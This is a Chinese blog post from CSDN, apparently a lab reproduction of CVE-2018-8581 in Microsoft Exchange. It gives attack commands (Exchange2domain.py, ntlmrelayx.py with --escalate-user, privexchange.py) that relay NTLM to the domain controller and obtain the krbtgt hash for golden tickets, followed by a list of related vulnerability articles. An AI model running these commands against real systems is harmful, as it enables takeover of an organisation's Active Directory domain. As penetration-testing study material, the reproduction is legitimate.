CVE-2018-8581复现

最新推荐文章于 2025-03-30 11:19:34 发布

挖低危的清风

最新推荐文章于 2025-03-30 11:19:34 发布

阅读量1k

点赞数

分类专栏：内网渗透文章标签：安全 csrf

本文链接：https://blog.csdn.net/weixin_42255372/article/details/103618358

版权

内网渗透专栏收录该内容

4 篇文章

订阅专栏

漏洞描述：

Exchange Server于2018年11月份被爆出存在SSRF漏洞，可以伪造任意用户。但在之后又被爆出另外一种攻击方式，可以使用任意域内用户通过NTML Relay获取到krbtgt的hash。该hash可用于制作黄金票据，最后可以达到全域通畅的效果。

影响范围：

Exchange 2010、Exchange 2013、Exchange 2016

漏洞复现：

环境：
DC Windows 2012 (192.168.52.3/ad01.qfdomain.com)
Exchange 2013 Windows 2012 （192.168.52.4/mail.qfdomain.com）
Attack Parrot (192.168.52.101)

攻击方式一：

python Exchange2domain.py -ah 192.168.52.101 -ap 80 -u attack -p "attack" -d qfdomain.com -th 192.168.52.3  192.168.52.4 --no-ssl

一键获取krbtgt的hash

攻击方式二
一、开启反射监听

 python2 ntlmrelayx.py -t ldap://192.168.52.3 --escalate-user attack

monitor
二、开启攻击

python2 privexchange.py -ah 192.168.52.101 mail.qfdomain.com -u attack -p "attack" -d qfdomain.com --no-ssl --debug

attack
三、如果攻击成功，那么会在我们的监听端看到DC反连我们的信息

四、拉取HASH

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

挖低危的清风

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Exchange SSRF 域内提权漏洞复现(CVE-2018-8581)

谢公子的博客

07-01

4074

漏洞描述 Exchange Server于2018年11月份被爆出存在SSRF漏洞，可以伪造任意用户。但在之后又被爆出另外一种攻击方式，可以使用任意域内用户通过NTML Relay来接管域控！攻击者仅需要拥有一个普通域内用户权限即可对存在漏洞的Exchange服务器发起攻击，进而接管域控。漏洞影响版本 Exchange 2010 ~ Exchange 2016 漏洞过程 Exchange允许任何用户为推送订阅指定所需的URL，服务器将尝试向这个URL发送通知。问题出在Excha...

CVE-2018-8581漏洞复现

whojoe的博客

08-26

1090

CVE-2018-8581漏洞复现环境搭建漏洞复现参考文章环境搭建主机机器名 ip 用户密码版本域控1 ad1.test.com 192.168.164.174 administrator Aa1234 win2012r2 exchange2016-粗1 mail1.test.com 192.168.164.173 administrator Aa1234 win2012r2 域内机器 user.test.com 192.168.164.129 user1 Uu1234.

参与评论您还未登录，请先登录后发表或查看评论

CVE-2025-30208（文件读取）漏洞复现

最新发布

ljh123321ljh的博客

03-30

641

漏洞源于Vite在处理URL查询参数时的逻辑缺陷。当请求路径包含特定参数（**如?import&raw?**）时，Vite对URL尾部分隔符（如?和&）的正则匹配不严格，导致安全检查被绕过。中存在的一个高危逻辑漏洞，允许攻击者通过构造特殊的URL绕过文件访问限制，读取服务器上的任意文件（如配置文件、密钥、数据库凭据等）。CVE-2025-30208是。2.在fofa搜索，寻找存在漏洞ip。3.尝试传参，得到相关信息。

Microsoft Exchange漏洞记录(撸向域控) - CVE-2018-8581

dengzhasong7076的博客

01-22

3006

前一段时间exchange出现了CVE-2018-8581，搭了许久的环境，不过不得不敬佩这个漏洞整体超赞。一开始主要还是利用盗取exchange的管理员权限去调用一些接口，导致可以做到，比如收取别人邮件，替别人发送邮件。攻击域控今天出了一个更加深入的利用分析主要是利用了ews推送的ssrf，进行ntlm relay，从http -> ldap的利用。主要还是exchang...

Microsoft Exchange CVE-2018-8581资源合集(附今日爆款)

blackorbird的博客

01-22

346

近日，Microsoft公告中披露了一则关于Exchange Server的任意用户伪造漏洞Exchange Server 是微软公司的一套电子邮件服务组件，是个消息与协...

Microsoft Exchange漏洞分析 - CVE-2018-8581

dengzhasong7076的博客

01-30

996

此篇为漏洞分析，想看漏洞利用可以点这前言前一段时间Exchange出现了CVE-2018-8581漏洞，整个漏洞利用超赞，很值得复现以及分析，因为其中需要的不仅仅是Web方面的，更多还需要Windows相关的安全知识，其中相结合才能达到如此大的危害。其根本原因由于PushSubscription接口存在SSRF，它允许为任何用户推送订阅所指定的URL，当Exchange尝试连接UR...

OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令

03-31

本篇将详细讨论如何修补OpenSSH中的几个已知漏洞，包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。首先，让我们了解这些特定的漏洞： 1. CVE-2020-15778：这是一个与OpenSSH密钥协商过程相关的漏洞，可能...

CVE-2018-8174_EXP:CVE-2018-8174_python

05-16

CVE-2018-8174_EXP 用法：CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用可选参数：-h，--help显示此帮助消息并退出-u URL，--url URL exp url -o OUTPUT，--output OUTPUT...

CVE-2018-3191利用exp

01-08

标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞，该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI（Java Naming and Directory Interface）注入...

CVE-2018-18778.docx

07-23

**CVE-2018-18778：mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞，它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...

CVE-2018-8581 漏洞分析

whojoe的博客

08-27

2764

CVE-2018-8581 漏洞分析前言环境搭建工具分析前言这里只是简单分析漏洞产生的代码逻辑，因为不熟悉exchange的业务逻辑，所以分析不会很深入，争取以后慢慢补充环境搭建主机机器名 ip 用户密码版本域控1 ad1.test.com 192.168.164.174 administrator Aa1234 win2012r2 exchange2016-cu11 mail1.test.com 192.168.164.173 administrator Aa1234

EXCHANGE上冒充任意用户--Exchange Server权限提升漏洞(CVE-2018-8581)分析

weixin_30929011的博客

06-18

407

0x00 前言这是我们2018年Top 5趣案系列中的第三个案例。这些漏洞都有一些因素使它们从今年发布的大约1，400个报告中脱颖而出。今天我们将分析一个Exchange漏洞，它允许任何经过身份验证的用户冒充Exchange Server上的其他用户。在ZDI的Dustin Childs 12月的文章中，他提到了一个Exchange漏洞，允许Exchange服务器上的任何用户冒充该Exc...

探索CVE-2018-8581：一个深度学习网络安全研究项目

gitblog_00040的博客

03-27

397

探索CVE-2018-8581：一个深度学习网络安全研究项目去发现同类优质开源项目:https://gitcode.com/ 项目简介该项目聚焦于2018年发现的一个关键的安全漏洞 CVE-2018-8581。该漏洞主要影响Microsoft SharePoint服务器，允许远程攻击者执行任意代码并获得受感染系统的完全控制权。此开源项目旨在研究这个漏洞的工作原理，并提供一种基于机器学习的检测方...

利用Exchange Server CVE-2018-8581+HASH传递玩爆AD

weixin_33770878的博客

01-29

346

概述微软 Exchange Server于2018年11月份被爆出存在S.S.R.F漏洞，漏洞编号为：CVE-2018-8581，此漏洞微软已推出缓解措施，但是在1月22日又爆出了此漏洞的另一种方法，而利用这种新的方法将为AD带来严重的安全风险，此漏洞在实施微软的缓解措施之后，仍然会被成功attack。本文将在以下环境中进行模拟演练：1.Exchange2013 CU19（已实施微软推出的缓解措...

Exchange CVE-2018-8581 补丁有用？没用？

weixin_43639741的博客

04-17

717

n1nty@360 A-TEAM 对网络安全只要稍有关注的话应该早就已经知道这个漏洞了。 CVE-2018-8581 TL;DR 漏洞最早由 ZDI 披露，ZDI 发现的 PoC 里面利用此漏洞实现了接管任意人的收件箱的效果。原理比较简单，该漏洞实质是由 SSRF （Server-Side Request Forgery：服务器端请求伪造）漏洞和其他安全机制相结合造成的。Exchange 允许任...

Exchange Server反序列化漏洞复现(CVE-2020-0688)

谢公子的博客

07-10

2672

漏洞描述: 漏洞产生的主要原因就是在Exchange ECP组件中发现，邮件服务在安装的过程中不会随机生成秘钥，也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的，攻击者可以利用静态秘钥对服务器发起攻击，在服务器中以SYSTEM权限远程执行代码。漏洞影响版本： Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 Microsoft Exchange Serve

漏洞复现-Exchange系列

aming小老弟

02-20

698

Exchage就是我们常说的邮箱服务器。Exchange是由微软推出的用于企业环境中部署的邮件服务器。微软对外发布的第一个Exchange版本是Exchange 4.0，最开始Exchange使用X.400目录服务，随后转向使用微软的活动目录，最开始的时候微软还提供了Microsoft Exchange Client，即Exchange邮件客户端，随后被Outlook取代。

【已复现】Microsoft Exchange Server "OWASSRF" 漏洞安全风险通告

smellycat000的专栏

12-26

2346

奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告Microsoft Exchange Server是微软公司的一套电子邮件服务组件。除传统的电子邮件的存取、储存、转发功能外，在新版本的产品中亦加入了一系列辅助功能，如语音邮件、邮件过滤筛选和OWA（基于Web的电子邮件存取）。近日，奇安信CERT监测到CrowdStrike发布针对Microsoft Exchange...

cve-2018-19518 复现

03-21

好的，用户想要复现CVE-2018-19518漏洞。首先我需要回忆这个漏洞的具体情况。根据引用中的信息，这个漏洞与PHP的imap扩展有关，存在远程命令执行的可能。用户提供的引用[2]提到初始界面是邮箱登录，有三个参数：邮箱...